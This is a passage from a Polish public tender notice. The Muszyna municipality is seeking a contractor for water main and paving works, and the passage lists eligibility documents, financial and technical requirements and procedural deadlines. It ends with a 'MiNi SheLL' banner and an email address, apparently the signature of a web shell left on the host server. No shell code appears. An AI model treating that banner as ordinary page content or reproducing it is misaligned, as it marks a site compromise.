2) nie podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 	2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r Nr 223, poz. 1655 z późn. zm). 	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są 	złożyć 	oświadczenie (zawierające również oświadczenie dot. spełniania warunków zawartych 	w art. 22 ustawy pzp) - załącznik nr 1, a także przedłożyć następujące dokumenty 	(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 	lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla 	każdego z nich): 
a) aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie 	właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 	określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p. wystawiona nie wcześniej niż 6 miesięcy przed 	upływem terminu składania ofert; 
b) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 	1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu 	składania ofert, dotyczy tylko podmiotów zbiorowych w rozumieniu ustawy Pzp
c) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

4.2. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 	zamiast dokumentów, o których mowa powyżej w pkt 4.1.1)a) oraz 4.1.2)a)b)c), składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce 	zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne 	albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 	płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
2) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 	zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt 4.1.2)a)b)c), zastępuje 	się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 	sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 	odpowiednio w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 	zamieszkania. 
3) Dokumenty, o których mowa powyżej, potwierdzające spełnianie warunków udziału w 	postępowaniu, sporządzone w języku obcym są składane w formie oryginału, odpisu, wypisu, 	wyciągu lub kopii wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 	Wykonawca(cy) winni złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. 	Dokument ten może być złożony przez każdego z Wykonawców składających ofertę 	wspólną(jedynie w sytuacji, jeśli każdy z nich spełnia wszystkie warunki samodzielnie), albo może 	być złożony wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez 	pełnomocnika lub przez osoby reprezentujące wszystkich wykonawców.

5. Zdolność ekonomiczna i finansowa
	Informacje i formalności konieczne do dokonania oceny spełniania wymogów.
	Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 	niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki 	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego 	zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty 	ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą 	spełnianie tego warunku), tzn: 
5.1) posiadać w ostatnich 3 latach obrotowych prowadzonej działalności, a jeżeli okres prowadzenia 	jest krótszy, to w tym okresie, średniorocznie przychody netto w kwocie minimum 5 mln PLN( rok 	obrotowy - rozumie się przez to rok kalendarzowy lub inny okres trwający 12 kolejnych miesięcy 	kalendarzowych). 
	W celu potwierdzenia spełnienia niniejszego warunku Wykonawca (każdy z Wykonawców 	składających ofertę wspólną) zobowiązany jest przedłożyć rachunek zysków i strat, a w przypadku 	Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego, innych dokumentów 	określających przychody netto ze sprzedaży - za okres ostatnich 3 lat obrotowych, a jeżeli okres 	prowadzenia działalności jest krótszy - za ten okres, 
5.2) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	o wartości nie mniejszej niż 4.000.000,00 zł. W celu potwierdzenia spełniania niniejszego warunku 	Wykonawca (każdy z Wykonawców składających ofertę wspólną) musi załączyć do oferty oryginał 	lub poświadczoną za zgodność z oryginałem kopię polisy lub inny/-e dokument/-y, potwierdzający/-	e, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	gospodarczej.

6. Zdolność techniczna
	Informacje i formalności konieczne do dokonania oceny spełniania wymogów:
	Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, 	a także dysponować osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawić 	pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób 	zdolnych do wykonania zamówienia;
	W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego 	ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie 	ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): 
6.1) zatrudnia kierownika budowy (lub kierownika budowy i kierowników robót) posiadającego 	(posiadających) uprawnienia do kierowania robotami bez ograniczeń, które pozwalają na 	kierowanie robotami budowlanymi w specjalności; konstrukcyjno budowlanej, drogowej, 	instalacyjnej w zakresie sieci, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej 	w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (art. 14 ust. 1 ustawy 	z dnia 07 lipca 1994 r. Prawo budowlane Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.). 	W przypadku uprawnień budowlanych wydanych wcześniej, uprawnienia do kierowania robotami 	budowlanymi muszą odpowiadać zakresem powyższemu.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację na temat liczby zatrudnionych kierowników robót/budowy (rozumiemy przez to także §1 ust. 2 pkt 5 i 5a rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane) - załącznik nr 2, (wzór wykazu) wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Należy do załącznika nr 2 dołączyć kopie zaświadczeń o przynależności do Izby Samorządu Zawodowego, kserokopie wymaganych uprawnień zawodowych dla wszystkich kierowników robót/budowy.
Zaświadczenia i uprawnienia mogą być złożone w formie kserokopii potwierdzonych za zgodność z oryginałem przez Wykonawcę. 
6.2) Wymagane jest, aby Wykonawca w ciągu ostatnich 5 lat przed dniem publikacji ogłoszenia o 	zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonywał 	roboty budowlane odpowiadające specyfiką przedmiotowi zamówienia (roboty związane z budową 	sieci wodociągowych, budową nawierzchni z kostki brukowej i asfaltowej), z których każda na 	kwotę minimum 1,3 mln PLN bez podatku VAT, w tym wymaga się, aby co najmniej jedna 	inwestycja była z zakresu ochrony środowiska, o wartości robót minimum 1,3 mln PLN bez 	podatku VAT.
	W celu potwierdzenia spełniania niniejszego warunku, Wykonawcy zobowiązani są przedłożyć 	wykaz wykonanych robót budowlanych: nie mniej niż 3 wykonane roboty: 
	- dwie odpowiadające specyfiką przedmiotowi zamówienia: jedna inwestycja związana z budową 	lub przebudową nawierzchni z kostki brukowej o pow. min 2000 m2, jedna inwestycja związana 	z budową lub przebudową nawierzchni z asfaltu o pow. min 7000 m2, 
	- jedna robota budowlana z zakresu ochrony środowiska (budowa magistrali wodociągowej) 	o średnicy od 160 mm do 315 mm dł min. 1000 mb i (budowa wodociągu) o średnicy 160 mm dł. 	min. 500 mb
Należy przedłożyć wykaz wykonanych robót budowlanych (nie mniej niż 3) - załącznik nr 3 wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie (referencje).
W celu potwierdzenia, że Wykonawca dysponuje potencjałem technicznym (lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego), Wykonawca winien przedłożyć informacje na temat sprzętu, urządzeń jakie posiada w celu realizacji zamówienia - załącznik nr 4..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> wnioski o dopuszczenie do udziału w postępowaniu wraz z załącznikami dostępne są na stronie www.muszyna.pl - baner BIP.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 11:50, miejsce: Urząd Miasta i Gminy Uzdrowiskowej Muszyna 
ul. Rynek 31 
33-370 Muszyna
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com